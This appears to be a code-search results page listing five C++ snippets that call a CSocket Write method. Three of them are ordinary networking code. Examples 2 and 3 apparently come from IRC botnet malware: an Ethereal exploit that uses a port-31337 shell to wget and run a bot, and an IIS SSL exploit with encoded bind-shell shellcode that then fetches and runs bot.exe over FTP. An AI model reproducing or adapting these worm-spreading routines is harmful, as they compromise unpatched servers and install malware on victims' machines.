Example #1
0
	void SendNotification(CModule& module, const CString& sSender, const CString& sNotification, const CChan *pChannel) {
		// todo parse from m_sPushEndpoint
		bool bUseTLS = true;
		CString sHostname = "api.palaverapp.com";
		unsigned short uPort = 443;
		CString sPath = "/1/push";

		CString sJSON = "{";
		sJSON += "\"message\": \"" + sNotification.Replace_n("\"", "\\\"") + "\"";
		sJSON += ",\"sender\": \"" + sSender.Replace_n("\"", "\\\"") + "\"";
		if (pChannel) {
			sJSON += ",\"channel\": \"" + pChannel->GetName().Replace_n("\"", "\\\"") + "\"";
		}
		sJSON += "}";

		CSocket *pSocket = new CSocket(&module);
		pSocket->Connect(sHostname, uPort, bUseTLS);
		pSocket->Write("POST " + sPath + " HTTP/1.1\r\n");
		pSocket->Write("Host: " + sHostname + "\r\n");
		pSocket->Write("Authorization: Bearer " + GetToken() + "\r\n");
		pSocket->Write("Connection: close\r\n");
		pSocket->Write("User-Agent: ZNC\r\n");
		pSocket->Write("Content-Type: application/json\r\n");
		pSocket->Write("Content-Length: " + CString(sJSON.length()) + "\r\n");
		pSocket->Write("\r\n");
		pSocket->Write(sJSON);
		pSocket->Close(Csock::CLT_AFTERWRITE);
		module.AddSocket(pSocket);
	}
Example #2
0
bool CScannerEthereal::Exploit() {
	if(!IsPrivate(g_pMainCtrl->m_pIRC->m_sLocalIp.CStr()) && IsPrivate(m_sSocket.m_szHost)) return false;

	// We need root to exploit this cause we need to spoof packets
	if(getuid()) return false;

	ExploitInt(0); ExploitInt(1); ExploitInt(2); ExploitInt(3);
	
	CSocket sShellSocket; if(sShellSocket.Connect(m_sSocket.m_szHost, 31337)) {
		CString sCmdBuf; sShellSocket.RecvTO(sCmdBuf.GetBuffer(8192), 8192, 2000);
		sCmdBuf.Format("echo -e open %s %d\\nuser ftp bla\\nget bot\\nquit\\n | ftp -n\n", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);
		sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength()); sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192);
		sCmdBuf.Format("wget ftp://bla:bla@%s:%d/bot\n", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);
		sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength()); sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192);
		sCmdBuf.Assign("chmod 777 ./bot ; ./bla\n");
		sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength()); sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192);
		sShellSocket.Disconnect(); return true; } else return false; }
Example #3
0
bool CScannerHTTP::ExploitIISSSL(int iHTTPType) {
	unsigned int	i;
	unsigned char	*badbuf, *p;
	unsigned long	offset=0x6741a1cd, XOR=0xffffffff;

	if(g_pMainCtrl->m_pBot->scaninfo_level.iValue >= 2) {
		SendLocal("%s: scanning ip %s", m_sScannerName.CStr(), m_sSocket.m_szHost); } 
	
	char sslshit[]="\x80\x62\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x82\x01\x00\x00\x00";

	/* hidden cmd.exe, bind port 1981 */
	char shellcode[]="\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x66\x01\x80\x34\x0A\x99\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x99\x98\x99\x99\xC3\x21\x95\x69\x64\xE6\x12\x99\x12\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x9A\x6A\x12\xEF\xE1\x9A\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0\x71\xE5\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41\xF3\x9D\xC0\x71\xF0\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B\x66\xCE\x69\x12\x41\x5E\x9E\x9B\x99\x9E\x24\xAA\x59\x10\xDE\x9D\xF3\x89\xCE\xCA\x66\xCE\x6D\xF3\x98\xCA\x66\xCE\x61\xC9\xC9\xCA\x66\xCE\x65\x1A\x75\xDD\x12\x6D\xAA\x42\xF3\x89\xC0\x10\x85\x17\x7B\x62\x10\xDF\xA1\x10\xDF\xA5\x10\xDF\xD9\x5E\xDF\xB5\x98\x98\x99\x99\x14\xDE\x89\xC9\xCF\xCA\xCA\xCA\xF3\x98\xCA\xCA\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xCA\x66\xCE\x7D\xC9\x66\xCE\x71\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59\x5A\x71\x62\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xC9\xEB\xF6\xFA\xFC\xEA\xEA\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC\xED\xD8\x99\xFB\xF0\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED\x99";

	badbuf=(unsigned char*)malloc(347); memset(badbuf, 0, 347);
	p=badbuf; memcpy(p, sslshit, sizeof(sslshit));
	p+=sizeof(sslshit)-1; strcat((char*)p, jumper);
	strcat((char*)p, greetings_to_microsoft);

	offset^=XOR; strncat((char*)p, (char*)&offset, 4);
	strcat((char*)p, shellcode);

	if(!m_sSocket.Write((char*)badbuf, 346)) { m_sSocket.Disconnect(); return false; }
	Sleep(1000); CSocket outSocket;
	if(!outSocket.Connect(m_sSocket.m_szHost, 1981)) {
		if(g_pMainCtrl->m_pBot->scaninfo_level.iValue>=2)
			SendLocal("%s: Not vulnerable: %s", m_sScannerName.CStr(), m_sSocket.m_szHost);
		m_sSocket.Disconnect(); return false; }

	/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
	/* Thanks to PhaTTy for this piece of code :)                */
	char mkdir_buff[400]="";
	int iPort=g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue;
	/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/

	sprintf(mkdir_buff, "echo open %s %d > bla.txt\necho user blah blah >> bla.txt\necho binary >> bla.txt\necho get %s >> bla.txt\necho quit >> bla.txt\nftp.exe -n -s:bla.txt\n%s\n",
		g_pMainCtrl->m_pIRC->m_sLocalIp.CStr(), iPort, "bot.exe", "bot.exe");

	char szRecvBuf[8192];
	if(!outSocket.RecvTO(szRecvBuf, sizeof(szRecvBuf), 5000)) {
		m_sSocket.Disconnect(); outSocket.Disconnect(); return false; }

	Sleep(500);

	if(!outSocket.Write((char *) mkdir_buff, sizeof(mkdir_buff))) {
		m_sSocket.Disconnect(); outSocket.Disconnect(); return false; }

	/* successful!!! */
	if(g_pMainCtrl->m_pBot->scaninfo_level.iValue>=2) {
		SendLocal("%s: Exploited %s", m_sScannerName.CStr(), m_sSocket.m_szHost); }

	m_sSocket.Disconnect(); return true; }
Example #4
0
static void s_WriteToSocket(CSocket& sock,
        const char* output_buffer, size_t output_buffer_size)
{
    size_t bytes_written;

    while (output_buffer_size > 0) {
        EIO_Status  status = sock.Write(output_buffer,
                output_buffer_size, &bytes_written);
        if (status != eIO_Success) {
            // Error writing to the socket.
            // Log what we can.
            string message_start;

            if (output_buffer_size > 32) {
                CTempString buffer_head(output_buffer, 32);
                message_start = NStr::PrintableString(buffer_head);
                message_start += " (TRUNCATED)";
            } else {
                CTempString buffer_head(output_buffer, output_buffer_size);
                message_start = NStr::PrintableString(buffer_head);
            }

            NCBI_THROW_FMT(CNetStorageException, eIOError,
                    "Error writing message to the NetStorage server " <<
                            sock.GetPeerAddress() << ". "
                    "Socket write error status: " <<
                            IO_StatusStr(status) << ". "
                    "Bytes written: " <<
                            NStr::NumericToString(bytes_written) << ". "
                    "Message begins with: " << message_start);
        }

        output_buffer += bytes_written;
        output_buffer_size -= bytes_written;
    }
}
Example #5
0
CString ExecuteHTTPGet (const CString &sInput)
	{
	//	Parse the input

	char *pPos = sInput.GetParsePointer() + STR_HTTP_GET_PREFIX.GetLength();

	//	Parse the URL

	CString sHost;
	CString sPath;
	if (!urlParse(pPos, NULL, &sHost, &sPath))
		return CString("Invalid URL.");

	//	If no host, then local host

	if (sHost.IsEmpty())
		sHost = CString("localhost");

	//	Connect

	CSocket theSocket;
	if (!theSocket.Connect(sHost, 80))
		return strPattern("Unable to connect to: %s.", sHost);

	//	Compose a request

	CHTTPMessage Request;
	Request.InitRequest(CString("GET"), sPath);
	Request.AddHeader(HEADER_HOST, sHost);
	Request.AddHeader(HEADER_CONNECTION, CString("keep-alive"));
#ifdef DEBUG_REQUEST_FRAGMENT_X
	Request.AddHeader(HEADER_USER_AGENT, CString("AI1/1.0 (This is a test of the header parsing system in Hexarc. There is probably a bug in which splitting the header across packets will cause failure of the HTTP parsing engine.)"));
#else
	Request.AddHeader(HEADER_USER_AGENT, CString("AI1/1.0"));
#endif

	//	Send the request

	CBuffer Buffer(4096);
	Request.WriteToBuffer(Buffer);

#ifdef DEBUG_REQUEST_FRAGMENT
	int iTotalLen = Buffer.GetLength();
	int iSplit = 105;

	if (iSplit < iTotalLen)
		{
		printf("Split at %d bytes\n", iSplit);
		CString sPart(Buffer.GetPointer(), iSplit);
		printf("%s\n", (LPSTR)sPart);

		theSocket.Write(Buffer.GetPointer(), iSplit);
		::Sleep(10);
		theSocket.Write(Buffer.GetPointer() + iSplit, iTotalLen - iSplit);
		}
	else
		theSocket.Write(Buffer.GetPointer(), Buffer.GetLength());
#else
	theSocket.Write(Buffer.GetPointer(), Buffer.GetLength());
#endif

	//	Now read the response. We build up a buffer to hold it.

	CHTTPMessage Response;
	CBuffer ResponseBuff;

	//	Keep reading until we've got enough (or until the connection drops)

	while (!Response.IsMessageComplete())
		{
		CBuffer TempBuffer(8192);

		//	Read

		int iBytesRead = theSocket.Read(TempBuffer.GetPointer(), 8192);
		TempBuffer.SetLength(iBytesRead);

		//	If we're no making progress, then we're done

		if (iBytesRead == 0)
			return strPattern("Unable to read entire message.");

		//	Add to entire buffer

		ResponseBuff.Write(TempBuffer.GetPointer(), iBytesRead);

		//	Parse to see if we're done

		if (!Response.InitFromPartialBuffer(TempBuffer))
			return strPattern("Unable to parse HTTP message.");
		}

	//	Done

	theSocket.Disconnect();

	return CString(ResponseBuff.GetPointer(), ResponseBuff.GetLength());
	}